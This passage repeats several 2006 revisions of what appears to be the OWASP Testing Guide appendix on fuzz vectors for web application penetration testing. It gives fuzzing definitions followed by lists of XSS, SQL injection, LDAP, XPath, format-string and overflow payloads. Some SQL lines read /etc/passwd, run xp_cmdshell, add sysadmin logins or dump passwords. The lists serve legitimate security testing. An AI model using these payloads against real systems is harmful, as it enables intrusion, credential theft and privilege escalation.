&lt;nowiki&gt;%x%x%x%x&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%d%d%d%d&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%s%s%s%s&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%99999999999s&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%08x&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%%20d&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%%20n&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%%20x&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%%20s&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%s%s%s%s%s%s%s%s%s%s&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%p%p%p%p%p%p%p%p%p%p&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%s x 129&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%x x 257&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Integer Overflows (INT) ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;-1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x100&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x1000&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x3fffffff&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x7ffffffe&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x7fffffff&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x80000000&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0xfffffffe&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0xffffffff&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x10000&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x100000&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Passive SQL Injection (SQP) ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;' OR 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;OR 1=1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR '1'='1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;; OR '1'='1'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%27+OR+%277659%27%3D%277659&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%27+--+&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&quot; or 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 1=1 /*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;or 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 'a'='a&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&quot; or &quot;a&quot;=&quot;a&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;') or ('a'='a&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;Admin' OR '&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' having 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' having 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' group by userid having 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 1 in (select @@version)--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' union all select @@version--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'unusual' = 'unusual'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'something' = 'some'+'thing'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'text' = N'text'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'something' like 'some%'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 2 &gt; 1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'text' &gt; 't'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'whatever' in ('whatever')&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 2 BETWEEN 1 and 3&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or username like char(37);&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' union select * from users where login = char(114,111,111,116);&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' union select <br /> &lt;nowiki&gt;Password:*/=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;UNI/**/ON SEL/**/ECT&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'; EXEC ('SEL' + 'ECT US' + 'ER')&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'/**/OR/**/1/**/=/**/1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 1/*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%27+OR+%277659%27%3D%277659&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%27+--+&amp;password=&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login &gt; @var select @var as var into temp end --&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' and 1 in (select var from temp)--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' union select 1,load_file('/etc/passwd'),1,1,1;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' and 1=( if((load_file(char(110,46,101,120,116))&lt;&gt;char(39,39)),1,0));&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Active SQL Injection (SQI) ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;'; exec master..xp_cmdshell 'ping 10.10.1.2'--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;CRATE USER name IDENTIFIED BY 'pass123'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;CRATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; &lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' ; drop table temp --&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;exec sp_addlogin 'name' , 'password'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;exec sp_addsrvrolemember 'name' , 'sysadmin'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;GRANT CONNECT TO name; GRANT RESOURCE TO name;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === LDAP Injection ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;*()|%26'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;admin*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;admin*)((|userPassword=*)&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;*)(uid=*))(|(uid=*&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === XPATH Injection ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;'+or+'1'='1&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> <br /> {{Category:OWASP Testing Project AoC}}</div> Wisec https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&diff=13693 OWASP Testing Guide Appendix C: Fuzz Vectors 2006-11-26T11:40:30Z <p>Wisec: Added LDAP and XPATH fuzz vectors</p> <hr /> <div>[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&lt;br&gt;<br /> {{Template:OWASP Testing Guide v2}}<br /> <br /> <br /> The following are fuzzing vectors which can be used with webscarab, jbrofuzz or another fuzzer.<br /> Fuzzing is the &quot;kitchen sink&quot; approach to testing the response of an application to parameter manipulation. Generally one looks for error conditions that are generated in an application as a result of fuzzing.<br /> This is the simple part of the discovery phase.<br /> Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required.<br /> <br /> === Fuzz Categories ===<br /> <br /> In the case of stateless network protocol fuzzing (like HTTP(S)) two broad categories exist:<br /> <br /> * Recursive fuzzing<br /> * Replasive fuzzing<br /> <br /> We examine and define each category in the sub-sections that follow. <br /> <br /> ==== Recursive fuzzing ====<br /> <br /> Recursive fuzzing can be defined as the process of fuzzing a part of a request by iterating through all the possible combinations of a set alphabet. Consider the case of:<br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/8302fa3b&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> Selecting &quot;8302fa3b&quot; as a part of the request to be fuzzed against the set hexadecimal alphabet i.e. {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} falls under the category of recursive fuzzing. This would generate a total of 16^8 requests of the form:<br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/00000000&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;...&lt;/nowiki&gt;<br /> &lt;nowiki&gt;http://www.example.com/11000fff&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;...&lt;/nowiki&gt;<br /> &lt;nowiki&gt;http://www.example.com/ffffffff&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;/pre&gt;<br /> <br /> ==== Replasive fuzzing ====<br /> <br /> Replasive fuzzing can be defined as the process of fuzzing part of a request by means of replacing it with a set value. This value is known as a fuzz vector. In the case of:<br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/8302fa3b&lt;/nowiki&gt;<br /> &lt;/pre&gt;<br /> <br /> Testing against Cross Site Scripting (XSS) by sending the following fuzz vectors: <br /> <br /> &lt;pre&gt;<br /> &lt;nowiki&gt;http://www.example.com/&gt;&quot;&gt;&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;&amp;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;http://www.example.com/'';!--&quot;&lt;XSS&gt;=&amp;{()}&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;/pre&gt;<br /> <br /> This is a form of replasive fuzzing. In this category, the total number of requests is dependant on the number of fuzz vectors specified. <br /> <br /> The remainder of this appendix presents a number of fuzz vector categories.<br /> <br /> === Cross Site Scripting (XSS) ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;&gt;&quot;&gt;&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;&amp;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&quot;&gt;&lt;STYLE&gt;@import&quot;javascript:alert('XSS')&quot;;&lt;/STYLE&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&gt;&quot;'&gt;&lt;img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&gt;%22%27&gt;&lt;img%20src%3d%22javascript:alert(%27%20XSS%27)%22&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&gt;&quot;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'';!--&quot;&lt;XSS&gt;=&amp;{()}&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;javascript:alert('XSS');&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=javascript:alert('XSS')&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt; &lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=JaVaScRiPt:alert(&amp;amp;quot;XSS&lt;WBR&gt;&amp;amp;quot;)&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;&lt;WBR&gt;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;&lt;WBR&gt;#116;&amp;amp;#58;&amp;amp;#97;&amp;amp;#108;&amp;amp;#101;&amp;amp;&lt;WBR&gt;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83&lt;WBR&gt;;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG<br /> SRC=&amp;#0000106&amp;#0000097&amp;&lt;WBR&gt;#0000118&amp;#0000097&amp;#0000115&amp;&lt;WBR&gt;#0000099&amp;#0000114&amp;#0000105&amp;&lt;WBR&gt;#0000112&amp;#0000116&amp;#0000058&amp;&lt;WBR&gt;#0000097&amp;#0000108&amp;#0000101&amp;&lt;WBR&gt;#0000114&amp;#0000116&amp;#0000040&amp;&lt;WBR&gt;#0000039&amp;#0000088&amp;#0000083&amp;&lt;WBR&gt;#0000083&amp;#0000039&amp;#0000041&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;&lt;WBR&gt;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;&lt;WBR&gt;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;&lt;WBR&gt;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x09;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x0A;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&lt;IMG SRC=&quot;jav&amp;amp;#x0D;ascript:alert(&lt;WBR&gt;'XSS');&quot;&gt;&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Buffer Overflows (BFO) ===<br /> <br /> Brief description here. <br /> <br /> Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.<br /> <br /> &lt;nowiki&gt;A x 5&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 17&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 33&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 65&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 129&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 257&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 513&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 1024&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 2049&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 4097&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 8193&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;A x 12288&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Format String Errors (FSE) ===<br /> <br /> Brief description here.<br /> <br /> %s%p%x%d&lt;/nowiki&gt;&lt;br&gt;<br /> .1024d&lt;/nowiki&gt;&lt;br&gt;<br /> %.2049d&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%p%p%p%p&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%x%x%x%x&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%d%d%d%d&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%s%s%s%s&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%99999999999s&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%08x&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%%20d&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%%20n&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%%20x&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%%20s&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%s%s%s%s%s%s%s%s%s%s&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%p%p%p%p%p%p%p%p%p%p&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%s x 129&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%x x 257&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Integer Overflows (INT) ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;-1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x100&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x1000&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x3fffffff&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x7ffffffe&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x7fffffff&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x80000000&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0xfffffffe&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0xffffffff&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x10000&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;0x100000&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Passive SQL Injection (SQP) ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;' OR 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;OR 1=1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR '1'='1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;; OR '1'='1'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%27+OR+%277659%27%3D%277659&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%27+--+&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&quot; or 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 1=1 /*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;or 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 'a'='a&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;&quot; or &quot;a&quot;=&quot;a&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;') or ('a'='a&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;Admin' OR '&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' having 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' having 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' group by userid having 1=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 1 in (select @@version)--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' union all select @@version--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'unusual' = 'unusual'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'something' = 'some'+'thing'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'text' = N'text'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'something' like 'some%'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 2 &gt; 1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'text' &gt; 't'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 'whatever' in ('whatever')&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' OR 2 BETWEEN 1 and 3&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or username like char(37);&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' union select * from users where login = char(114,111,111,116);&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' union select <br /> &lt;nowiki&gt;Password:*/=1--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;UNI/**/ON SEL/**/ECT&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'; EXEC ('SEL' + 'ECT US' + 'ER')&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'/**/OR/**/1/**/=/**/1&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' or 1/*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%27+OR+%277659%27%3D%277659&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%22+or+isnull%281%2F0%29+%2F*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;%27+--+&amp;password=&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login &gt; @var select @var as var into temp end --&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' and 1 in (select var from temp)--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' union select 1,load_file('/etc/passwd'),1,1,1;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' and 1=( if((load_file(char(110,46,101,120,116))&lt;&gt;char(39,39)),1,0));&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === Active SQL Injection (SQI) ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;'; exec master..xp_cmdshell 'ping 10.10.1.2'--&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;CRATE USER name IDENTIFIED BY 'pass123'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;CRATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; &lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;' ; drop table temp --&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;exec sp_addlogin 'name' , 'password'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;exec sp_addsrvrolemember 'name' , 'sysadmin'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;GRANT CONNECT TO name; GRANT RESOURCE TO name;&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === LDAP Injection ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;*()|%26'&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;admin*&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;admin*)((|userPassword=*)&lt;/nowiki&gt;&lt;br&gt;<br /> &lt;nowiki&gt;*)(uid=*))(|(uid=*&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> === XPATH Injection ===<br /> <br /> Brief description here.<br /> <br /> &lt;nowiki&gt;'+or+'1'='1&lt;/nowiki&gt;&lt;br&gt;<br /> <br /> <br /> {{Category:OWASP Testing Project AoC}}</div> Wisec https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&diff=13692 OWASP Testing Guide Appendix C: Fuzz Vectors 2006-11-26T10:07:58Z <p>Wisec: /* Replasive fuzzing */ replaced owasp.org with example.com</p> <hr /> <div>[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&lt;br&gt;<br /> {{Template:OWASP Testing Guide v2}}<br /> <br /> <br /> The following are fuzzing vectors which can be used with webscarab, jbrofuzz or another fuzzer.<br /> Fuzzing is the &quot;kitchen sink&quot; approach to testing the response of an application to parameter 